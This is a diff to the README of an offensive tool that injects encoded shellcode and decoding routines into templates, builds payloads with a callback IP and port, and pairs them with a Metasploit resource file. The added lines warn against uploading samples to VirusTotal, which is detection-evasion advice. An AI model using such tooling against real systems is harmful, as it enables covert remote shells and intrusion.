Nariod/laz-y/README.md

 * `pip3 install -r requirements.txt`

 ## Usage
+* DO NOT UPLOAD ANYTHING TO VIRUSTOTAL
 * Add your CS templates in the "templates" folder
 * Add the mark `!!!_SHELLCODE_MARK!!!` in the templates, where you want the shellcode to be injected
 * Add the mark `!!!DECODE_ROUTINE!!!` in the templates, where you want the decoding routine to be injected
 * Run the script with `python3 laz-y.py -l CALLBACK_IP -p CALLBACK_PORT -e ENCODING_OPTION`
+* Edit and import the .rc file in msfconsole

 ![Usage](/images/Usage-screenshot.png)